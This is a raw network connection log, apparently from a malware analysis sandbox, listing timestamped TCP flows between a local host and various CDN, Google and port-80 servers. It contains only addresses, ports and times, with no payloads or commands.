Sep 1, 2024 06:28:19.444931030 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.445103884 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.445126057 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.446283102 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.446343899 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.446728945 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.446784019 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.446914911 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.446921110 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.449351072 CEST	443	49740	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.449383020 CEST	443	49740	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.449405909 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.449419022 CEST	443	49740	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.449440002 CEST	443	49740	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.449444056 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.449457884 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.449486971 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.450614929 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.450628042 CEST	443	49740	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.557049990 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.557065010 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.557369947 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.557388067 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.557395935 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.557538033 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.639098883 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.639107943 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.639152050 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.639163971 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.639185905 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.639200926 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.639225960 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.640974045 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.640993118 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.641014099 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.641040087 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.641047955 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.642571926 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.725467920 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.725505114 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.725521088 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.725529909 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.725550890 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.725563049 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.725586891 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.726186037 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.726192951 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.726270914 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.726294041 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.730576038 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.777430058 CEST	443	49742	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:19.778578043 CEST	49742	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:19.904803991 CEST	80	49743	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:19.905109882 CEST	49743	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:19.921262980 CEST	49745	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:19.921310902 CEST	443	49745	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:19.921688080 CEST	49746	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:19.921688080 CEST	49747	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:19.921698093 CEST	443	49746	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:19.921705961 CEST	443	49747	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:19.921729088 CEST	49745	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:19.921766996 CEST	49746	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:19.921766996 CEST	49747	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:19.922071934 CEST	49748	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:19.922080040 CEST	443	49748	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:19.922138929 CEST	49748	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:19.922583103 CEST	49746	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:19.922583103 CEST	49745	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:19.922596931 CEST	443	49746	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:19.922609091 CEST	443	49745	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:19.922728062 CEST	49747	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:19.922738075 CEST	443	49747	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:19.926578999 CEST	49748	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:19.926589012 CEST	443	49748	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:19.938576937 CEST	49743	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:19.942341089 CEST	49742	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:19.942363024 CEST	443	49742	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:19.942637920 CEST	443	49742	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:19.943546057 CEST	80	49743	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:20.031591892 CEST	49742	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:20.066576004 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:20.066596985 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:20.076497078 CEST	443	49742	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:20.087423086 CEST	49750	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.087443113 CEST	443	49750	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.087816954 CEST	49750	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.088124990 CEST	49750	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.088135004 CEST	443	49750	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.187405109 CEST	80	49743	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:20.187490940 CEST	49743	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:20.218873024 CEST	443	49742	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:20.218938112 CEST	443	49742	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:20.219321966 CEST	49742	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:20.243931055 CEST	49742	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:20.243958950 CEST	443	49742	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:20.243973017 CEST	49742	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:20.243978977 CEST	443	49742	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:20.299078941 CEST	49754	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:20.299117088 CEST	443	49754	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:20.299218893 CEST	49754	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:20.299628973 CEST	49754	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:20.299644947 CEST	443	49754	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:20.318583012 CEST	49743	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:20.322596073 CEST	49755	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:20.323852062 CEST	80	49743	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:20.324018002 CEST	49743	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:20.327584028 CEST	80	49755	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:20.327744007 CEST	49755	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:20.330578089 CEST	49755	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:20.335673094 CEST	80	49755	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:20.389749050 CEST	443	49747	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.390099049 CEST	49747	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.390115023 CEST	443	49747	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.391182899 CEST	443	49747	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.391326904 CEST	49747	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.391675949 CEST	443	49748	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.392626047 CEST	49747	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.392685890 CEST	443	49747	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.392858028 CEST	49748	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.392878056 CEST	443	49748	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.393170118 CEST	49747	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.393176079 CEST	443	49747	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.393982887 CEST	443	49748	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.394396067 CEST	49748	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.396397114 CEST	443	49746	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.397061110 CEST	49748	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.397119999 CEST	443	49748	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.397197008 CEST	49746	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.397203922 CEST	443	49746	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.397392035 CEST	49748	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.397397995 CEST	443	49748	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.399413109 CEST	443	49746	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.399518967 CEST	49746	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.400644064 CEST	49746	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.400758982 CEST	443	49746	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.400924921 CEST	49746	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.403646946 CEST	443	49745	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.406574965 CEST	49745	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.406582117 CEST	443	49745	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.407733917 CEST	443	49745	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.407800913 CEST	49745	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.408679962 CEST	49745	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.408768892 CEST	443	49745	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.408953905 CEST	49745	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.408960104 CEST	443	49745	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.448503017 CEST	443	49746	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.504216909 CEST	443	49747	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.506678104 CEST	49747	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.506856918 CEST	49747	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.506874084 CEST	443	49747	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.528328896 CEST	443	49745	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.530670881 CEST	49745	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.530842066 CEST	49745	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.530847073 CEST	443	49745	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.536994934 CEST	443	49748	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.537041903 CEST	49748	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.537200928 CEST	49748	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.537214041 CEST	443	49748	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.542164087 CEST	443	49746	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.542206049 CEST	49746	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.542387009 CEST	49746	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:28:20.542391062 CEST	443	49746	162.159.61.3	192.168.2.5
Sep 1, 2024 06:28:20.576858044 CEST	443	49750	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.587168932 CEST	49750	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.587177992 CEST	443	49750	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.588242054 CEST	443	49750	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.588299036 CEST	49750	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.590054035 CEST	49750	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.590115070 CEST	443	49750	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.590215921 CEST	49750	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.590221882 CEST	443	49750	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.698894978 CEST	49750	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.707782030 CEST	443	49750	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.707838058 CEST	443	49750	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.707876921 CEST	49750	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.707979918 CEST	49750	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:20.707989931 CEST	443	49750	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:20.945794106 CEST	443	49754	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:20.945866108 CEST	49754	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:20.947160006 CEST	49754	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:20.947174072 CEST	443	49754	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:20.947427034 CEST	443	49754	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:20.948661089 CEST	49754	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:20.996500015 CEST	443	49754	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:21.082792997 CEST	80	49755	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:21.082850933 CEST	49755	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:21.088365078 CEST	49755	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:21.093221903 CEST	80	49755	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:21.178977013 CEST	49732	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:21.226174116 CEST	443	49754	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:21.226236105 CEST	443	49754	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:21.226294041 CEST	49754	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:21.236624002 CEST	49754	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:21.236644983 CEST	443	49754	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:21.236659050 CEST	49754	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:21.236665010 CEST	443	49754	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:21.348237991 CEST	80	49755	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:21.348288059 CEST	49755	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:21.452466011 CEST	49755	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:21.452739954 CEST	49756	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:21.459908962 CEST	80	49756	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:21.459997892 CEST	49756	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:21.460143089 CEST	49756	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:21.461555004 CEST	80	49755	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:21.461709976 CEST	49755	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:21.467426062 CEST	80	49756	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:21.871718884 CEST	49757	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:21.871764898 CEST	443	49757	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:21.872009993 CEST	49758	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:21.872016907 CEST	443	49758	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:21.872088909 CEST	49758	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:21.872088909 CEST	49757	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:21.872289896 CEST	49757	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:21.872301102 CEST	443	49757	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:21.873513937 CEST	49758	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:21.873521090 CEST	443	49758	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.209742069 CEST	80	49756	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:22.210588932 CEST	49756	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:22.336816072 CEST	443	49757	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.358155966 CEST	443	49758	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.390635967 CEST	49757	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.427220106 CEST	49757	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.427248001 CEST	443	49757	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.427476883 CEST	49758	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.427484035 CEST	443	49758	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.427829981 CEST	443	49757	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.427939892 CEST	443	49758	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.428808928 CEST	49758	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.428808928 CEST	49757	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.428881884 CEST	443	49758	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.428883076 CEST	443	49757	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.495371103 CEST	49757	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.539335966 CEST	49756	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:22.544533014 CEST	80	49756	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:22.564590931 CEST	49758	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.575532913 CEST	49759	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:22.575563908 CEST	443	49759	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:22.575664043 CEST	49759	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:22.575704098 CEST	49760	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:22.575743914 CEST	443	49760	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:22.575861931 CEST	49760	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:22.575917959 CEST	49759	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:22.575930119 CEST	443	49759	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:22.576064110 CEST	49760	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:22.576080084 CEST	443	49760	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:22.792716980 CEST	80	49756	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:22.792790890 CEST	49756	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:22.831989050 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:22.832019091 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:22.832099915 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:22.832281113 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:22.832293987 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:22.904304981 CEST	49756	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:22.904588938 CEST	49762	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:22.911602020 CEST	80	49762	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:22.911659002 CEST	49762	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:22.911849976 CEST	49762	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:22.912964106 CEST	80	49756	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:22.913016081 CEST	49756	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:22.922209024 CEST	80	49762	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:23.058914900 CEST	443	49759	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.068618059 CEST	443	49760	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.085304976 CEST	49760	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.085325956 CEST	443	49760	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.085748911 CEST	49759	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.085760117 CEST	443	49759	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.085822105 CEST	443	49760	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.085886002 CEST	49760	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.086193085 CEST	443	49759	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.086249113 CEST	49759	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.086570024 CEST	443	49760	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.086632013 CEST	49760	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.086889982 CEST	443	49759	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.086947918 CEST	49759	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.121187925 CEST	49760	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.121279955 CEST	49759	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.121350050 CEST	443	49760	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.121496916 CEST	443	49759	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.122390985 CEST	49760	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.122405052 CEST	443	49760	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.122785091 CEST	49759	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.122800112 CEST	443	49759	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.201961994 CEST	49760	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.202028990 CEST	49759	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.230604887 CEST	443	49759	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.231024981 CEST	443	49759	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.231100082 CEST	49759	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.233542919 CEST	443	49760	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.233722925 CEST	443	49760	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.233774900 CEST	49760	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.234914064 CEST	49759	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.234932899 CEST	443	49759	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.235892057 CEST	49760	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.235908031 CEST	443	49760	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.311579943 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.314673901 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:23.314686060 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.315817118 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.315876007 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:23.324748993 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:23.324835062 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.325206995 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:23.325221062 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.388678074 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:23.422051907 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.422161102 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.422262907 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:23.422274113 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.422348022 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.422389030 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:23.422394991 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.423857927 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.423912048 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:23.424101114 CEST	49761	443	192.168.2.5	142.251.40.228
Sep 1, 2024 06:28:23.424114943 CEST	443	49761	142.251.40.228	192.168.2.5
Sep 1, 2024 06:28:23.564743042 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.564773083 CEST	443	49763	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.565234900 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.565265894 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.565278053 CEST	443	49764	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.565340042 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.571505070 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.571518898 CEST	443	49763	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.571985960 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.572002888 CEST	443	49764	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.663600922 CEST	80	49762	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:23.663686991 CEST	49762	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:23.664385080 CEST	49762	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:23.670825958 CEST	80	49762	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:23.914882898 CEST	80	49762	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:23.914938927 CEST	49762	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:24.028218985 CEST	49762	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:24.028558969 CEST	49765	80	192.168.2.5	185.215.113.19
